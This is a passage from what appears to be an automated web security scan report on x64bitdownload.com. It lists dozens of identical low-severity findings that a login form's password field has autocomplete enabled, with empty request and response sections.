15.200. http://www.x64bitdownload.com/64-bit-binary-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.201. http://www.x64bitdownload.com/64-bit-board-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-board-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.202. http://www.x64bitdownload.com/64-bit-boards-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-boards-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.203. http://www.x64bitdownload.com/64-bit-client-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-client-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.204. http://www.x64bitdownload.com/64-bit-commander-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-commander-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.205. http://www.x64bitdownload.com/64-bit-community-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-community-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.206. http://www.x64bitdownload.com/64-bit-complex-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-complex-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.207. http://www.x64bitdownload.com/64-bit-conference-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-conference-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.208. http://www.x64bitdownload.com/64-bit-cross-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-cross-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.209. http://www.x64bitdownload.com/64-bit-download-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-download-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.210. http://www.x64bitdownload.com/64-bit-downloader-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-downloader-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.211. http://www.x64bitdownload.com/64-bit-explorer-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-explorer-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.212. http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.213. http://www.x64bitdownload.com/64-bit-fast-download-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-fast-download-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.214. http://www.x64bitdownload.com/64-bit-feed-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feed-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.215. http://www.x64bitdownload.com/64-bit-feedreader-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feedreader-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.216. http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-grabber-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.217. http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-sharing-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.218. http://www.x64bitdownload.com/64-bit-firefox-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-firefox-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.219. http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.220. http://www.x64bitdownload.com/64-bit-forum-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.221. http://www.x64bitdownload.com/64-bit-forums-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forums-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.222. http://www.x64bitdownload.com/64-bit-google-groups-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-google-groups-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.223. http://www.x64bitdownload.com/64-bit-grabber-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-grabber-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.224. http://www.x64bitdownload.com/64-bit-group-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-group-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.225. http://www.x64bitdownload.com/64-bit-groups-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-groups-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.226. http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-highspeed-connection-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.227. http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-image-grabber-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.228. http://www.x64bitdownload.com/64-bit-images-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-images-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.229. http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.230. http://www.x64bitdownload.com/64-bit-internet-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.231. http://www.x64bitdownload.com/64-bit-kill-file-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-kill-file-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.232. http://www.x64bitdownload.com/64-bit-killfile-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-killfile-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.233. http://www.x64bitdownload.com/64-bit-mp3-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-mp3-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.234. http://www.x64bitdownload.com/64-bit-multimedia-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multimedia-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.235. http://www.x64bitdownload.com/64-bit-multipart-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multipart-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.236. http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.237. http://www.x64bitdownload.com/64-bit-news-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.238. http://www.x64bitdownload.com/64-bit-news-reader-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-reader-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.239. http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsfeed-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.240. http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.241. http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.242. http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.243. http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.244. http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.245. http://www.x64bitdownload.com/64-bit-newsreader-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.246. http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.247. http://www.x64bitdownload.com/64-bit-nntp-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.248. http://www.x64bitdownload.com/64-bit-nzb-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nzb-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.249. http://www.x64bitdownload.com/64-bit-ozum-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ozum-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.250. http://www.x64bitdownload.com/64-bit-par-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-par-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.251. http://www.x64bitdownload.com/64-bit-podcast-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-podcast-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.252. http://www.x64bitdownload.com/64-bit-posts-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-posts-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.253. http://www.x64bitdownload.com/64-bit-rar-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rar-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.254. http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.255. http://www.x64bitdownload.com/64-bit-reader-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.256. http://www.x64bitdownload.com/64-bit-reading-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reading-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.257. http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.258. http://www.x64bitdownload.com/64-bit-rss-client-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-client-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.259. http://www.x64bitdownload.com/64-bit-rss-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.260. http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-feed-reader-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.261. http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-reader-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.262. http://www.x64bitdownload.com/64-bit-search-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-search-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.263. http://www.x64bitdownload.com/64-bit-ssl-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ssl-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.264. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronization-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.265. http://www.x64bitdownload.com/64-bit-synchronize-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronize-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.266. http://www.x64bitdownload.com/64-bit-topic-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-topic-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.267. http://www.x64bitdownload.com/64-bit-troll-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-troll-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.268. http://www.x64bitdownload.com/64-bit-troll-killer-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-troll-killer-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.269. http://www.x64bitdownload.com/64-bit-trollkiller-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-trollkiller-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.270. http://www.x64bitdownload.com/64-bit-use-next-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-use-next-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.271. http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.272. http://www.x64bitdownload.com/64-bit-usenet-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.273. http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-search-engine-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.274. http://www.x64bitdownload.com/64-bit-usenext-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenext-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.275. http://www.x64bitdownload.com/64-bit-video-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-video-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.276. http://www.x64bitdownload.com/64-bit-xpat-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-xpat-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.277. http://www.x64bitdownload.com/64-bit-yenc-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-yenc-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.278. http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/a-oz-insight-1768-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.279. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.280. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-business-downloads-2-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.281. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.282. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.283. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-downloads-3-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.284. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.285. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.286. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.287. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.288. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

